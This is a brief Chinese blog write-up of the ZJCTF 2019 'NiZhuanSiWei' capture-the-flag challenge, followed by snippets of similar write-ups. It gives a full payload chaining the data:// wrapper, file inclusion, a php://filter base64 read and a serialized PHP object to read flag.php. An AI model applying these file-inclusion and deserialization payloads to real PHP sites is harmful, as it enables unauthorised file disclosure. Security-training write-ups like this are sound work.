[ZJCTF 2019]NiZhuanSiWei1

evil_ming

于 2022-04-23 16:02:18 发布

阅读量289

点赞数

文章标签：经验分享

本文链接：https://blog.csdn.net/evil_ming/article/details/124364290

版权

一看就是代码审计啊。打开useless.php 发现空白就想用base64编码来查看。

用个在线php编码的来序列化

构造payload之后访问源码得到flag

text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}

over.

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

evil_ming

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

BUUCTF-[ZJCTF 2019]NiZhuanSiWei

lunan的博客

05-15

404

BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议，data://，php:// payload构造： text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造： file=php://filter/read=convert.base64-encode/resource=useless.

[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化

最新发布

oZuoShen123的博客

10-09

966

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "".file_get_contents($text,'r').""; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file);

参与评论您还未登录，请先登录后发表或查看评论

[ZJCTF 2019]NiZhuanSiWei

brainw的博客

04-22

2656

[ZJCTF 2019]NiZhuanSiWei 代码审计查看一下useless.php --只有注释信息没有用利用data协议绕过将welcome to the zjctf写入而data://协议允许读入 payload： text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了只有看下wp了正则判断...

[ZJCTF 2019]NiZhuanSiWei 1

生死看淡，不服就干的博客

03-22

2051

进入靶机，如下根据提示信息，可知需要三个参数：text，file，password，且 text 的文本内容也已经限定，那么桌面建立一个文本文档，内容为：welcome to the zjctf，尝试用 file 协议读取，发现不行 ?text=file://C:\Users\Hacker\Desktop\test.txt 尝试多次，发现 data 协议可以 ?text=data://text/plain,welcome to the zjctf 4. 构造 file 参数，之前代码提示了.

web buuctf [ZJCTF 2019]NiZhuanSiWei1

weixin_44214568的博客

03-14

1302

一共有三个参数，需要考虑传参，php传参，而且是text和file这样的值，基本可以考虑需要用php伪协议， php伪协议是基于文件包含的，文件包含有本地包含和远程包含，当包含的文件在远程服务器上时，就形成了远程文件包含。远程文件包含需要在 php.ini 中设置： allow_url_include = on（是否允许 include/require 远程文件） allow_url_fopen = on（是否允许打开远程文件） php伪协议是php支持的协议和封装协议贴（我从...

[ZJCTF 2019]NiZhuanSiWei【超详细讲解】

wo41ge的博客

11-15

4024

进入题目链接这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>

BUU--[ZJCTF 2019]NiZhuanSiWei

cadandme的博客

05-06

449

BUU–[ZJCTF 2019]NiZhuanSiWei 刷了一道题，思路是有一些了，但还是看大佬的wp才做出来，记录一下。看了很久才知道要get传三个参数，第一个if是限制text，传入的内容在读取文件后必须是后边的一段，这个可以使用伪协议，但 php://input 使用这个协议时失败了，与之相似的写入文件的协议还有data协议，使用这个协议 ?text=data://text/plain;base64,[d2VsY29tZSB0byB0aGUgempjdGY=] 第二个if 这个来查看文件的，

魔术方法总结

梦里不知身是客

12-26

9879

__construct()，类的构造函数 __destruct()，类的析构函数 __call()，在对象中调用一个不可访问方法时调用 __callStatic()，用静态方式中调用一个不可访问方法时调用 __get()，获得一个类的成员变量时调用 __set()，设置一个类的成员变量时调用 __isset()，当对不可访问属性调用isset()或empty()时调用 __unset(

buuctf-[ZJCTF 2019]NiZhuanSiWei 1（小宇特详解）

小宇的web博客

01-21

3544

buuctf-[ZJCTF 2019]NiZhuanSiWei 1（小宇特详解）这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".